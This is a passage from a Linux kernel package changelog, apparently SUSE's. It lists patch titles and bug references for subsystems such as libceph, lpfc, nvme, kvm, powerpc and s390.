Avoid ICRC errors by copying into the skb first (bsc#1049361).\n - ib/rxe: Disable completion upcalls when a CQ is destroyed (bsc#1049361).\n - ib/rxe: Fix destination cache for IPv6 (bsc#1049361).\n - ib/rxe: Fix up rxe_qp_cleanup() (bsc#1049361).\n - ib/rxe: Fix up the responder's find_resources() function (bsc#1049361).\n - ib/rxe: Handle NETDEV_CHANGE events (bsc#1049361).\n - ib/rxe: Move refcounting earlier in rxe_send() (bsc#1049361).\n - ib/rxe: Remove dangling prototype (bsc#1049361).\n - ib/rxe: Remove unneeded initialization in prepare6() (bsc#1049361).\n - ib/rxe: Set dma_mask and coherent_dma_mask (bsc#1049361).\n - igb: re-assign hw address pointer on reset after PCI error (bnc#1012382).\n - iio: ad7793: Fix the serial interface reset (bnc#1012382).\n - iio: adc: axp288: Drop bogus AXP288_ADC_TS_PIN_CTRL register\n modifications (bnc#1012382).\n - iio: adc: hx711: Add DT binding for avia,hx711 (bnc#1012382).\n - iio: adc: mcp320x: Fix oops on module unload (bnc#1012382).\n - iio: adc: mcp320x: Fix readout of negative voltages (bnc#1012382).\n - iio: adc: twl4030: Disable the vusb3v1 rugulator in the error handling\n path of 'twl4030_madc_probe()' (bnc#1012382).\n - iio: adc: twl4030: Fix an error handling path in 'twl4030_madc_probe()'\n (bnc#1012382).\n - iio: ad_sigma_delta: Implement a dedicated reset function (bnc#1012382).\n - iio: core: Return error for failed read_reg (bnc#1012382).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - iommu/arm-smmu-v3, acpi: Add temporary Cavium SMMU-V3 IORT model number\n definitions (bsc#1036060).\n - iommu/arm-smmu-v3: Increase CMDQ drain timeout value (bsc#1035479).\n Refresh patch to mainline version\n - iommu/io-pgtable-arm: Check for leaf entry before dereferencing it\n (bnc#1012382).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n - irqchip/gic-v3-its: Fix command buffer allocation (bsc#1057067).\n - iscsi-target: fix invalid flags in text response (bsc#1052095).\n - iw_cxgb4: put ep reference in pass_accept_req() (FATE#321658 bsc#1005778\n FATE#321660 bsc#1005780 FATE#321661 bsc#1005781).\n - iwlwifi: add workaround to disable wide channels in 5GHz (bnc#1012382).\n - iwlwifi: mvm: do not send CTDP commands via debugfs if not supported\n (bsc#1031717).\n - kabi: arm64: compatibility workaround for lse atomics (bsc#1055290).\n - kabi fix drivers/nvme/target/nvmet.h (bsc#1058550).\n - KABI fixup struct nvmet_sq (bsc#1063349).\n - kABI: protect enum fs_flow_table_type (bsc#1015342 FATE#321688\n bsc#1015343 FATE#321689).\n - kABI: protect enum pid_type (kabi).\n - kABI: protect struct iscsi_np (kabi).\n - kABI: protect struct mlx5_priv (bsc#1015342 FATE#321688 bsc#1015343\n FATE#321689).\n - kABI: protect struct rm_data_op (kabi).\n - kABI: protect struct sdio_func (kabi).\n - kabi/severities: add fs/ceph to kabi severities (bsc#1048228).\n - kabi/severities: Ignore drivers/scsi/cxgbi (bsc#1052094)\n - kabi/severities: Ignore kABI changes due to last patchset (bnc#1053472)\n - kabi/severities: ignore nfs_pgio_data_destroy\n - kABI: uninline task_tgid_nr_nr (kabi).\n - kABI: Workaround kABI breakage of AMD-AVIC fixes (bsc#1044503).\n - kernel/*: switch to memdup_user_nul() (bsc#1048893).\n - kernel/sysctl_binary.c: check name array length in\n deprecated_sysctl_warning() (FATE#323821).\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: Add struct kvm_vcpu pointer parameter to get_enable_apicv()\n (bsc#1044503).\n - kvm: arm64: Restore host physical timer access on hyp_panic()\n (bsc#1054082).\n - kvm: arm/arm64: Fix bug in advertising KVM_CAP_MSI_DEVID capability\n (bsc#1054082).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm, pkeys: do not use PKRU value in vcpu->arch.guest_fpu.state\n (bsc#1055935).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: SVM: Add irqchip_split() checks before enabling AVIC (bsc#1044503).\n - kvm: SVM: delete avic_vm_id_bitmap (2 megabyte static array)\n (bsc#1059500).\n - kvm: SVM: Refactor AVIC vcpu initialization into avic_init_vcpu()\n (bsc#1044503).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - kvm: x86: block guest protection keys unless the host has them enabled\n (bsc#1055935).\n - kvm: x86: kABI workaround for PKRU fixes (bsc#1055935).\n - kvm: x86: simplify handling of PKRU (bsc#1055935).\n - libata: transport: Remove circular dependency at free time (bnc#1012382).\n - libceph: abort already submitted but abortable requests when map or pool\n goes full (bsc#1048228).\n - libceph: add an epoch_barrier field to struct ceph_osd_client\n (bsc#1048228).\n - libceph: advertise support for NEW_OSDOP_ENCODING and SERVER_LUMINOUS\n (bsc#1048228).\n - libceph: advertise support for OSD_POOLRESEND (bsc#1048228).\n - libceph: allow requests to return immediately on full conditions if\n caller wishes (bsc#1048228).\n - libceph: always populate t->target_{oid,oloc} in calc_target()\n (bsc#1048228).\n - libceph: always signal completion when done (bsc#1048228).\n - libceph: apply_upmap() (bsc#1048228).\n - libceph: avoid unnecessary pi lookups in calc_target() (bsc#1048228).\n - libceph: ceph_connection_operations::reencode_message() method\n (bsc#1048228).\n - libceph: ceph_decode_skip_* helpers (bsc#1048228).\n - libceph: compute actual pgid in ceph_pg_to_up_acting_osds()\n (bsc#1048228).\n - libceph, crush: per-pool crush_choose_arg_map for crush_do_rule()\n (bsc#1048228).\n - libceph: delete from need_resend_linger before check_linger_pool_dne()\n (bsc#1048228).\n - libceph: do not allow bidirectional swap of pg-upmap-items (bsc#1061451).\n - libceph: do not call encode_request_finish() on MOSDBackoff messages\n (bsc#1048228).\n - libceph: do not call ->reencode_message() more than once per message\n (bsc#1048228).\n - libceph: do not pass pgid by value (bsc#1048228).\n - libceph: drop need_resend from calc_target() (bsc#1048228).\n - libceph: encode_{pgid,oloc}() helpers (bsc#1048228).\n - libceph: fallback for when there isn't a pool-specific choose_arg\n (bsc#1048228).\n - libceph: fix old style declaration warnings (bsc#1048228).\n - libceph: foldreq->last_force_resend into ceph_osd_request_target\n (bsc#1048228).\n - libceph: get rid of ack vs commit (bsc#1048228).\n - libceph: handle non-empty dest in ceph_{oloc,oid}_copy() (bsc#1048228).\n - libceph: initialize last_linger_id with a large integer (bsc#1048228).\n - libceph: introduce and switch to decode_pg_mapping() (bsc#1048228).\n - libceph: introduce ceph_spg, ceph_pg_to_primary_shard() (bsc#1048228).\n - libceph: kill __{insert,lookup,remove}_pg_mapping() (bsc#1048228).\n - libceph: make DEFINE_RB_* helpers more general (bsc#1048228).\n - libceph: make encode_request_*() work with r_mempool requests\n (bsc#1048228).\n - libceph: make RECOVERY_DELETES feature create a new interval\n (bsc#1048228).\n - libceph: make sure need_resend targets reflect latest map (bsc#1048228).\n - libceph: MOSDOp v8 encoding (actual spgid + full hash) (bsc#1048228).\n - libceph: new features macros (bsc#1048228).\n - libceph: new pi->last_force_request_resend (bsc#1048228).\n - libceph: NULL deref on osdmap_apply_incremental() error path\n (bsc#1048228).\n - libceph: osd_request_timeout option (bsc#1048228).\n - libceph: osd_state is 32 bits wide in luminous (bsc#1048228).\n - libceph: pg_upmap[_items] infrastructure (bsc#1048228).\n - libceph: pool deletion detection (bsc#1048228).\n - libceph: potential NULL dereference in ceph_msg_data_create()\n (bsc#1048228).\n - libceph: remove ceph_sanitize_features() workaround (bsc#1048228).\n - libceph: remove now unused finish_request() wrapper (bsc#1048228).\n - libceph: remove req->r_replay_version (bsc#1048228).\n - libceph: resend on PG splits if OSD has RESEND_ON_SPLIT (bsc#1048228).\n - libceph: respect RADOS_BACKOFF backoffs (bsc#1048228).\n - libceph: set -EINVAL in one place in crush_decode() (bsc#1048228).\n - libceph: support SERVER_JEWEL feature bits (bsc#1048228).\n - libceph: take osdc->lock in osdmap_show() and dump flags in hex\n (bsc#1048228).\n - libceph: upmap semantic changes (bsc#1048228).\n - libceph: use alloc_pg_mapping() in __decode_pg_upmap_items()\n (bsc#1048228).\n - libceph: use target pi for calc_target() calculations (bsc#1048228).\n - lib: test_rhashtable: fix for large entry counts (bsc#1055359).\n - lib: test_rhashtable: Fix KASAN warning (bsc#1055359).\n - lightnvm: remove unused rq parameter of nvme_nvm_rqtocmd() to kill\n warning (FATE#319466).\n - locking/rwsem: Fix down_write_killable() for\n CONFIG_RWSEM_GENERIC_SPINLOCK=y (bsc#969756).\n - locking/rwsem-spinlock: Fix EINTR branch in __down_write_common()\n (bsc#969756).\n - lpfc: Add Buffer to Buffer credit recovery support (bsc#1052384).\n - lpfc: convert info messages to standard messages (bsc#1052384).\n - lpfc: Correct issues with FAWWN and FDISCs (bsc#1052384).\n - lpfc: Correct return error codes to align with nvme_fc transport\n (bsc#1052384).\n - lpfc: Fix bad sgl reposting after 2nd adapter reset (bsc#1052384).\n - lpfc: Fix crash in lpfc nvmet when fc port is reset (bsc#1052384).\n - lpfc: Fix duplicate NVME rport entries and namespaces (bsc#1052384).\n - lpfc: Fix handling of FCP and NVME FC4 types in Pt2Pt topology\n (bsc#1052384).\n - lpfc: fix "integer constant too large" error on 32bit archs\n (bsc#1052384).\n - lpfc: Fix loop mode target discovery (bsc#1052384).\n - lpfc: Fix MRQ > 1 context list handling (bsc#1052384).\n - lpfc: Fix NVME PRLI handling during RSCN (bsc#1052384).\n - lpfc: Fix nvme target failure after 2nd adapter reset (bsc#1052384).\n - lpfc: Fix oops when NVME Target is discovered in a nonNVME environment\n (bsc#1052384).\n - lpfc: Fix plogi collision that causes illegal state transition\n (bsc#1052384).\n - lpfc: Fix rediscovery on switch blade pull (bsc#1052384).\n - lpfc: Fix relative offset error on large nvmet target ios (bsc#1052384).\n - lpfc: fixup crash during storage failover operations (bsc#1042847).\n - lpfc: Limit amount of work processed in IRQ (bsc#1052384).\n - lpfc: lpfc version bump 11.4.0.3 (bsc#1052384).\n - lpfc: remove console log clutter (bsc#1052384).\n - lpfc: support nvmet_fc defer_rcv callback (bsc#1052384).\n - lsm: fix smack_inode_removexattr and xattr_getsecurity memleak\n (bnc#1012382).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md/raid10: submit bio directly to replacement disk (bnc#1012382).\n - md/raid5: fix a race condition in stripe batch (linux-stable).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - megaraid_sas: Fix probing cards without io port (bsc#1053681).\n - mips: Ensure bss section ends on a long-aligned address (bnc#1012382).\n - mips: Fix minimum alignment requirement of IRQ stack (git-fixes).\n - mips: IRQ Stack: Unwind IRQ stack onto task stack (bnc#1012382).\n - mips: Lantiq: Fix another request_mem_region() return code check\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both infinite inputs\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input values with\n opposite signs (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of both inputs zero\n (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN propagation\n (bnc#1012382).\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both inputs negative\n (bnc#1012382).\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity and zero inputs\n (bnc#1012382).\n - mips: ralink: Fix incorrect assignment on ralink_soc (bnc#1012382).\n - mlx5: Avoid that mlx5_ib_sg_to_klms() overflows the klms array\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n - mm: avoid marking swap cached page as lazyfree (VM Functionality,\n bsc#1061775).\n - mm/backing-dev.c: fix an error handling path in 'cgwb_create()'\n (bnc#1063475).\n - mmc: mmc: correct the logic for setting HS400ES signal voltage\n (bsc#1054082).\n - mm,compaction: serialize waitqueue_active() checks (for real)\n (bsc#971975).\n - mmc: sdhci-xenon: add set_power callback (bsc#1057035).\n - mmc: sdhci-xenon: Fix the work flow in xenon_remove() (bsc#1057035).\n - mmc: sdio: fix alignment issue in struct sdio_func (bnc#1012382).\n - mm: discard memblock data later (bnc#1063460).\n - mm: fix data corruption caused by lazyfree page (VM Functionality,\n bsc#1061775).\n - mm, madvise: ensure poisoned pages are removed from per-cpu lists (VM hw\n poison -- git fixes).\n - mm/memblock.c: reversed logic in memblock_discard() (bnc#1063460).\n - mm: meminit: mark init_reserved_page as __meminit (bnc#1063509).\n - mm/memory_hotplug: change pfn_to_section_nr/section_nr_to_pfn macro to\n inline function (bnc#1063501).\n - mm/memory_hotplug: define find_{smallest|biggest}_section_pfn as\n unsigned long (bnc#1063520).\n - mm/page_alloc.c: apply gfp_allowed_mask before the first allocation\n attempt (bnc#971975 VM -- git fixes).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - mm/vmalloc.c: huge-vmap: fail gracefully on unexpected huge vmap\n mappings (bsc#1046529).\n - mptsas: Fixup device hotplug for VMWare ESXi (bsc#1030850).\n - net: core: Prevent from dereferencing null pointer when releasing SKB\n (bnc#1012382).\n - net: ethernet: hip04: Call SET_NETDEV_DEV() (bsc#1049336).\n - netfilter: fix IS_ERR_VALUE usage (bsc#1052888).\n - netfilter: invoke synchronize_rcu after set the _hook_ to NULL\n (bnc#1012382).\n - netfilter: nfnl_cthelper: fix incorrect helper->expect_class_max\n (bnc#1012382).\n - netfilter: x_tables: pack percpu counter allocations (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct instead of packet counter\n (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct to counter allocator\n (bsc#1052888).\n - net: hns: add acpi function of xge led control (bsc#1049336).\n - net: hns: Fix a skb used after free bug (bsc#1049336).\n - net/mlx4_core: Enable 4K UAR if SRIOV module parameter is not enabled\n (bsc#966191 FATE#320230 bsc#966186 FATE#320228).\n - net/mlx5: Check device capability for maximum flow counters (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5: Delay events till ib registration ends (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Check for qos capability in dcbnl_initialize (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Do not add/remove 802.1ad rules when changing 802.1Q VLAN\n filter (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix calculated checksum offloads counters (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix dangling page pointer on DMA mapping error (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix DCB_CAP_ATTR_DCBX capability for DCBNL getcap\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Fix inline header size for small packets (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Print netdev features correctly in error message (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5e: Schedule overflow check work to mlx5e workqueue (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5: E-Switch, Unload the representors in the correct order\n (bsc#1015342 FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5: Fix arm SRQ command for ISSI version 0 (bsc#1015342\n FATE#321688 bsc#1015343 FATE#321689).\n - net/mlx5: Fix command completion after timeout access invalid structure\n (bsc#966318 FATE#320158 bsc#966316 FATE#320159).\n - net/mlx5: Fix counter list hardware structure (bsc#1015342 FATE#321688\n bsc#1015343 FATE#321689).\n - net/mlx5: Remove the flag MLX5_INTERFACE_STATE_SHUTDOWN (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5: Skip mlx5_unload_one if mlx5_load_one fails (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net: mvpp2: fix the mac address used when using PPv2.2 (bsc#1032150).\n - net: mvpp2: use {get, put}_cpu() instead of smp_processor_id()\n (bsc#1032150).\n - net/packet: check length in getsockopt() called with PACKET_HDRLEN\n (bnc#1012382).\n - net: phy: Fix lack of reference count on PHY driver (bsc#1049336).\n - net: phy: Fix PHY module checks and NULL deref in phy_attach_direct()\n (bsc#1049336).\n - netvsc: Initialize 64-bit stats seqcount (fate#320485).\n - new helper: memdup_user_nul() (bsc#1048893).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - nfs: flush data when locking a file to ensure cache coherence for mmap\n (bsc#981309).\n - nvme: allow timed-out ios to retry (bsc#1063349).\n - nvme-fabrics: generate spec-compliant UUID NQNs (bsc#1057498).\n - nvme-fc: address target disconnect race conditions in fcp io submit\n (bsc#1052384).\n - nvme-fc: do not override opts->nr_io_queues (bsc#1052384).\n - nvme-fc: kABI fix for defer_rcv() callback (bsc#1052384).\n - nvme_fc/nvmet_fc: revise Create Association descriptor length\n (bsc#1052384).\n - nvme_fc: Reattach to localports on re-registration (bsc#1052384).\n - nvme-fc: revise TRADDR parsing (bsc#1052384).\n - nvme-fc: update tagset nr_hw_queues after queues reinit (bsc#1052384).\n - nvme-fc: use blk_mq_delay_run_hw_queue instead of open-coding it\n (bsc#1052384).\n - nvme: fix hostid parsing (bsc#1049272).\n - nvme: fix sqhd reference when admin queue connect fails (bsc#1063349).\n - nvme: fix visibility of "uuid" ns attribute (bsc#1060400).\n - nvme-loop: update tagset nr_hw_queues after reconnecting/resetting\n (bsc#1052384).\n - nvme: protect against simultaneous shutdown invocations (FATE#319965\n bnc#1012382 bsc#964944).\n - nvme-rdma: update tagset nr_hw_queues after reconnecting/resetting\n (bsc#1052384).\n - nvme: stop aer posting if controller state not live (bsc#1063349).\n - nvmet: avoid unneeded assignment of submit_bio return value\n (bsc#1052384).\n - nvmet_fc: Accept variable pad lengths on Create Association LS\n (bsc#1052384).\n - nvmet_fc: add defer_req callback for deferment of cmd buffer return\n (bsc#1052384).\n - nvmet-fc: correct use after free on list teardown (bsc#1052384).\n - nvmet-fc: eliminate incorrect static markers on local variables\n (bsc#1052384).\n - nvmet-fc: fix byte swapping in nvmet_fc_ls_create_association\n (bsc#1052384).\n - nvmet_fc: Simplify sg list handling (bsc#1052384).\n - nvmet: implement valid sqhd values in completions (bsc#1063349).\n - nvmet: Move serial number from controller to subsystem (bsc#1058550).\n - nvmet: prefix version configfs file with attr (bsc#1052384).\n - nvmet: preserve controller serial number between reboots (bsc#1058550).\n - nvmet: synchronize sqhd update (bsc#1063349).\n - nvme: use device_add_disk_with_groups() (bsc#1060400).\n - of: fix "/cpus" reference leak in of_numa_parse_cpu_nodes()\n (bsc#1056827).\n - ovl: fix dentry leak for default_permissions (bsc#1054084).\n - parisc: perf: Fix potential NULL pointer dereference (bnc#1012382).\n - partitions/efi: Fix integer overflow in GPT size calculation\n (FATE#322379 bnc#1012382 bsc#1020989).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci: Mark AMD Stoney GPU ATS as broken (bsc#1061046).\n - pci: rockchip: Handle regulator_get_current_limit() failure correctly\n (bsc#1056849).\n - pci: rockchip: Use normal register bank for config accessors\n (bsc#1056849).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - percpu_ref: allow operation mode switching operations to be called\n concurrently (bsc#1055096).\n - percpu_ref: remove unnecessary RCU grace period for staggered atomic\n switching confirmation (bsc#1055096).\n - percpu_ref: reorganize __percpu_ref_switch_to_atomic() and relocate\n percpu_ref_switch_to_atomic() (bsc#1055096).\n - percpu_ref: restructure operation mode switching (bsc#1055096).\n - percpu_ref: unify staggered atomic switching wait behavior (bsc#1055096).\n - perf: arm: acpi: remove cpu hotplug statemachine dependency\n (bsc#1062279).\n - perf: arm: platform: remove cpu hotplug statemachine dependency\n (bsc#1062279).\n - perf: arm: replace irq_get_percpu_devid_partition call (bsc#1062279).\n - perf: arm: temporary workaround for build errors (bsc#1062279).\n - perf: Convert to using %pOF instead of full_name (bsc#1062279).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - perf: xgene: Add APM X-Gene SoC Performance Monitoring Unit driver\n (bsc#1036737).\n - perf: xgene: Include module.h (bsc#1036737).\n - perf: xgene: Move PMU leaf functions into function pointer structure\n (bsc#1036737).\n - perf: xgene: Parse PMU subnode from the match table (bsc#1036737).\n - phy: Do not increment MDIO bus refcount unless it's a different owner\n (bsc#1049336).\n - phy: fix error case of phy_led_triggers_(un)register (bsc#1049336).\n - pm / Domains: Fix unsafe iteration over modified list of domains\n (bsc#1056849).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc: Fix unused function warning 'lmb_to_memblock' (FATE#322022).\n - powerpc/perf: Cleanup of PM_BR_CMPL vs. PM_BRU_CMPL in Power9 event list\n (bsc#1056686, fate#321438, bsc#1047238, git-fixes 34922527a2bc).\n - powerpc/perf: Factor out PPMU_ONLY_COUNT_RUN check code from power8\n (fate#321438, bsc#1053043, git-fixes efe881afdd999).\n - powerpc/pseries: Add pseries hotplug workqueue (FATE#322022).\n - powerpc/pseries: Auto-online hotplugged memory (FATE#322022).\n - powerpc/pseries: Check memory device state before onlining/offlining\n (FATE#322022).\n - powerpc/pseries: Correct possible read beyond dlpar sysfs buffer\n (FATE#322022).\n - powerpc/pseries: Do not attempt to acquire drc during memory hot add for\n assigned lmbs (FATE#322022).\n - powerpc/pseries: Fix build break when MEMORY_HOTREMOVE=n (FATE#322022).\n - powerpc/pseries: fix memory leak in queue_hotplug_event() error path\n (FATE#322022).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - powerpc/pseries: Implement indexed-count hotplug memory add\n (FATE#322022).\n - powerpc/pseries: Implement indexed-count hotplug memory remove\n (FATE#322022).\n - powerpc/pseries: Introduce memory hotplug READD operation (FATE#322022).\n - powerpc/pseries: Make the acquire/release of the drc for memory a\n seperate step (FATE#322022).\n - powerpc/pseries: Remove call to memblock_add() (FATE#322022).\n - powerpc/pseries: Revert 'Auto-online hotplugged memory' (FATE#322022).\n - powerpc/pseries: Update affinity for memory and cpus specified in a PRRN\n event (FATE#322022).\n - powerpc/pseries: Use kernel hotplug queue for PowerVM hotplug events\n (FATE#322022).\n - powerpc/pseries: Use lmb_is_removable() to check removability\n (FATE#322022).\n - powerpc/pseries: Verify CPU does not exist before adding (FATE#322022).\n - qeth: add network device features for VLAN devices (bnc#1053472,\n LTC#157385).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - r8169: Add support for restarting auto-negotiation (bsc#1050742).\n - r8169:Correct the way of setting RTL8168DP ephy (bsc#1050742).\n - r8169:fix system hange problem (bsc#1050742).\n - r8169:Fix typo in setting RTL8168H PHY parameter (bsc#1050742).\n - r8169:Fix typo in setting RTL8168H PHY PFM mode (bsc#1050742).\n - r8169:Remove unnecessary phy reset for pcie nic when setting link spped\n (bsc#1050742).\n - r8169:Update the way of reading RTL8168H PHY register "rg_saw_cnt"\n (bsc#1050742).\n - rda=sRDMA: Fix the composite message user notification (bnc#1012382).\n - rdma/bnxt_re: Allocate multiple notification queues (bsc#1037579).\n - rdma/bnxt_re: Implement the alloc/get_hw_stats callback (bsc#1037579).\n - rdma: Fix return value check for ib_get_eth_speed() (bsc#1056596).\n - rdma/qedr: Parse VLAN ID correctly and ignore the value of zero\n (bsc#1019695 FATE#321703 bsc#1019699 FATE#321702 bsc#1022604\n FATE#321747).\n - rdma/qedr: Parse vlan priority as sl (bsc#1019695 FATE#321703\n bsc#1019699 FATE#321702 bsc#1022604 FATE#321747).\n - rds: ib: add error handle (bnc#1012382).\n - Remove patch\n 0407-nvme_fc-change-failure-code-on-remoteport-connectivi.patch\n (bsc#1037838)\n - Remove superfluous hunk in bigmem backport (bsc#1064436).\n - Revert "ceph: SetPageError() for writeback pages if writepages fails"\n (bsc#1048228).\n - Revert "ipv6: add rcu grace period before freeing fib6_node" (kabi).\n - Revert "ipv6: fix sparse warning on rt6i_node" (kabi).\n - Revert "net: fix percpu memory leaks" (bnc#1012382).\n - Revert "net: phy: Correctly process PHY_HALTED in phy_stop_machine()"\n (bnc#1012382).\n - Revert "net: use lib/percpu_counter API for fragmentation mem\n accounting" (bnc#1012382).\n - Revert "Update\n patches.fixes/xfs-refactor-log-record-unpack-and-data-processing.patch\n (bsc#1043598, bsc#1036215)." This reverts commit\n 54e17b011580b532415d2aee5e875c8cf0460df4.\n - Revert "x86/acpi: Enable MADT APIs to return disabled apicids"\n (bnc#1056230).\n - Revert "x86/acpi: Set persistent cpuid &lt;-&gt; nodeid mapping when\n booting" (bnc#1056230).\n - Revert "xfs: detect and handle invalid iclog size set by mkfs\n (bsc#1043598)." This reverts commit\n caf0b124b172568b3e39544cb9abfdaa7fb3d852.\n - Revert "xfs: detect and trim torn writes during log recovery\n (bsc#1036215)." This reverts commit\n a7a591776e8628a33f0223ca9a3f46c1e79bd908.\n - Revert "xfs: refactor and open code log record crc check (bsc#1036215)."\n This reverts commit 6aef5e1fee21246222618f2337c84d6093281561.\n - Revert "xfs: refactor log record start detection into a new helper\n (bsc#1036215)." This reverts commit\n a424c875bdc05dcf3bb0d1af740b644773091cf0.\n - Revert "xfs: return start block of first bad log record during recovery\n (bsc#1036215)." This reverts commit\n cb0ce8b2f1435d7ac9aaeb5d5709e73946d55bed.\n - Revert "xfs: support a crc verification only log record pass\n (bsc#1036215)." This reverts commit\n f5c0c41b1f3626750f1f0d76b6d71fac673854d2.\n - Rewrote KVM kABI fix patches for addressing regressions (bsc#1063570)\n - rtnetlink: fix rtnl_vfinfo_size (bsc#1056261).\n - s390/cpcmd,vmcp: avoid GFP_DMA allocations (bnc#1060249, LTC#159112).\n - s390/diag: add diag26c support (bnc#1053472, LTC#156729).\n - s390: export symbols for crash-kmp (bsc#1053915).\n - s390: Include uapi/linux/if_ether.h instead of linux/if_ether.h\n (bsc#1053472).\n - s390/pci: do not cleanup in arch_setup_msi_irqs (bnc#1053472,\n LTC#157731).\n - s390/pci: fix handling of PEC 306 (bnc#1053472, LTC#157731).\n - s390/pci: improve error handling during fmb (de)registration\n (bnc#1053472, LTC#157731).\n - s390/pci: improve error handling during interrupt deregistration\n (bnc#1053472, LTC#157731).\n - s390/pci: improve pci hotplug (bnc#1053472, LTC#157731).\n - s390/pci: improve unreg_ioat error handling (bnc#1053472, LTC#157731).\n - s390/pci: introduce clp_get_state (bnc#1053472, LTC#157731).\n - s390/pci: provide more debug information (bnc#1053472, LTC#157731).\n - s390/pci: recognize name clashes with uids (bnc#1053472, LTC#157731).\n - s390/qdio: avoid reschedule of outbound tasklet once killed\n (bnc#1060249, LTC#159885).\n - s390/qeth: no ETH header for outbound AF_IUCV (bnc#1053472, LTC#156276).\n - s390/qeth: size calculation outbound buffers (bnc#1053472, LTC#156276).\n - s390/qeth: use diag26c to get MAC address on L2 (bnc#1053472,\n LTC#156729).\n - s390/topology: alternative topology for topology-less machines\n (bnc#1060249, LTC#159177).\n - s390/topology: always use s390 specific sched_domain_topology_level\n (bnc#1060249, LTC#159177).\n - s390/topology: enable / disable topology dynamically (bnc#1060249,\n LTC#159177).\n - sched/cpuset/pm: Fix cpuset vs. suspend-resume bugs (bnc#1012382).\n - scsi: csiostor: add check for supported fw version (bsc#1005776).\n - scsi: csiostor: add support for Chelsio T6 adapters (bsc#1005776).\n - scsi: csiostor: fix use after free in csio_hw_use_fwconfig()\n (bsc#1005776).\n - scsi: csiostor: switch to pci_alloc_irq_vectors (bsc#1005776).\n - scsi: csiostor: update module version (bsc#1052093).\n - scsi: cxgb4i: assign rxqs in round robin mode (bsc#1052094).\n - scsi: fixup kernel warning during rmmod() (bsc#1052360).\n - scsi: hisi_sas: add missing break in switch statement (bsc#1056849).\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure (bsc#1059465).\n - scsi: libfc: fix a deadlock in fc_rport_work (bsc#1063695).\n - scsi: lpfc: Ensure io aborts interlocked with the target (bsc#1056587).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: qedf: Fix a potential NULL pointer dereference (bsc#1048912).\n - scsi: qedf: Limit number of CQs (bsc#1040813).\n - scsi: qedi: off by one in qedi_get_cmd_from_tid() (bsc#1004527,\n FATE#321744).\n - scsi: qla2xxx: Fix uninitialized work element (bsc#1019675,FATE#321701).\n - scsi: scsi_transport_fc: 